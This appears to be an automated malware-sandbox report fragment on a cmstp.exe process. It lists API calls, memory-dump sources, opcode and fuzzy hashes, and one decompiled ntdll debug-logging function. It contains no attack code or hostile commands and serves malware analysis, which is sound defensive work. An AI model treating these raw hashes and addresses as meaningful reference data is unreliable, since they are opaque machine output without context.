                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0063AD62
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0064A744
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateInternalProcess
                        • String ID:
                        • API String ID: 2186235152-0
                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                        • Instruction ID: 0ec04ccedebbb632f8ad1f00bf62aba8b369b99dffb9d8bd9461d8e81773c933
                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                        • Instruction Fuzzy Hash: C401AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258BA0D97251C630E851CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0064A744
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateInternalProcess
                        • String ID:
                        • API String ID: 2186235152-0
                        • Opcode ID: 93b9ca38bc8d2c3fd0ee9cf105037330b6f9fea12ab1dfa659a1cf2d9c276d95
                        • Instruction ID: 40be32332cb0f07f828ec441156ba9e8f0b472ec66021a3ead12860381624768
                        • Opcode Fuzzy Hash: 93b9ca38bc8d2c3fd0ee9cf105037330b6f9fea12ab1dfa659a1cf2d9c276d95
                        • Instruction Fuzzy Hash: 0701F2B6204508ABCB44DF98DC80DEB37BDAF8C354F158248FA5997241C630E841CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0063F050,?,?,00000000), ref: 006491FC
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread
                        • String ID:
                        • API String ID: 2422867632-0
                        • Opcode ID: 76e68dc62f95f4698c16947fba794520fadff539deaa4a11adef0c5d1a858e1f
                        • Instruction ID: 831d1fb2cf8295e78b4dc99a571ad95c3dabf1a6f5a86ea0d46c42b8b745ebeb
                        • Opcode Fuzzy Hash: 76e68dc62f95f4698c16947fba794520fadff539deaa4a11adef0c5d1a858e1f
                        • Instruction Fuzzy Hash: 31E06D333902043AE3206999AC03FA7B29DDB81B20F15002AFA0DEA2C1D995F80142A8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0063F1D2,0063F1D2,?,00000000,?,?), ref: 0064A810
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 4afc676668f66c3ab003b91123a40a3e60a325a861e9ba376f83291ae90e9634
                        • Instruction ID: 48050cb6743c9b10c701abf7083b2b3e6094ce47043a67d5844591c4ac07ba5f
                        • Opcode Fuzzy Hash: 4afc676668f66c3ab003b91123a40a3e60a325a861e9ba376f83291ae90e9634
                        • Instruction Fuzzy Hash: 59F0E5B1200104BFDB20DFA4CC84FD77B6AEF88240F1581A8F90C97201C531D805CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0063F1D2,0063F1D2,?,00000000,?,?), ref: 0064A810
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                        • Instruction ID: 2467b6f6639f91f9648810ab3a46fa21ad4715d5d47fd8bd44942557a55a652c
                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                        • Instruction Fuzzy Hash: 3DE01AB52002086BDB10EF89CC85EE737ADAF88650F018154BE0857241C930E8148BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SetErrorMode.KERNELBASE(00008003,?,00638D14,?), ref: 0063F6FB
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: 0020bcd5582de1466d78dc52af32aa0935b8097fbd583779eeaca0b1ef8554fa
                        • Instruction ID: 40633d2f1566317cf4820f75bd5a9421da221096b839c5ce6c738985241fabfb
                        • Opcode Fuzzy Hash: 0020bcd5582de1466d78dc52af32aa0935b8097fbd583779eeaca0b1ef8554fa
                        • Instruction Fuzzy Hash: 40D02B716403043FE700BBE88C03F5633C69B40B00F594474FA18E63C3EC60E40181A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SetErrorMode.KERNELBASE(00008003,?,00638D14,?), ref: 0063F6FB
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: b894b85e471362e4b4b601cdc184ec6d8a2c7ffee4f558636a8ef7911e72c19a
                        • Instruction ID: 8e639670a7425bbff1b6fd998a14efece5ed6c0bb2e491184cd633c49df84298
                        • Opcode Fuzzy Hash: b894b85e471362e4b4b601cdc184ec6d8a2c7ffee4f558636a8ef7911e72c19a
                        • Instruction Fuzzy Hash: 16D05E616503082AE710AAA49C03F6632C96B45B00F490064F948963C3DD60E4008165
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 6025b3832e9f75eefc81500ea393807917e566784b0f31610f34d3922f8edcc1
                        • Instruction ID: 74fc4eb5ed7c8a39f3fb9f42a2dac05f778e65cb686ee3b5b156a940c369fba2
                        • Opcode Fuzzy Hash: 6025b3832e9f75eefc81500ea393807917e566784b0f31610f34d3922f8edcc1
                        • Instruction Fuzzy Hash: 39B02BB18010C0C5F700D76007087173D0077C0300F23C512D3024341A0338D0C0F1B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        C-Code - Quality: 53%
                        			E0486FDDA(intOrPtr* __edx, intOrPtr _a4) {
                        				void* _t7;
                        				intOrPtr _t9;
                        				intOrPtr _t10;
                        				intOrPtr* _t12;
                        				intOrPtr* _t13;
                        				intOrPtr _t14;
                        				intOrPtr* _t15;
                        
                        				_t13 = __edx;
                        				_push(_a4);
                        				_t14 =  *[fs:0x18];
                        				_t15 = _t12;
                        				_t7 = E0481CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                        				_push(_t13);
                        				E04865720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                        				_t9 =  *_t15;
                        				if(_t9 == 0xffffffff) {
                        					_t10 = 0;
                        				} else {
                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                        				}
                        				_push(_t10);
                        				_push(_t15);
                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                        				return E04865720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                        			}











                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0486FDFA
                        Strings
                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0486FE2B
                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0486FE01
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                        • API String ID: 885266447-3903918235
                        • Opcode ID: e05c3b2dd0306dea36e15e657e7be1e1d8bd2fc1a6d14e2b6fb41c17ed4b3a0d
                        • Instruction ID: 0465d68201c3e576d8d6d08af1d8d2c65dac1163adf3a85c9d68925c786fa1fa
                        • Opcode Fuzzy Hash: e05c3b2dd0306dea36e15e657e7be1e1d8bd2fc1a6d14e2b6fb41c17ed4b3a0d
                        • Instruction Fuzzy Hash: BAF021726406017FE7601A49DC02F237F5ADB44730F140719F714955E1EAA2F83097F5
                        Uniqueness

                        Uniqueness Score: -1.00%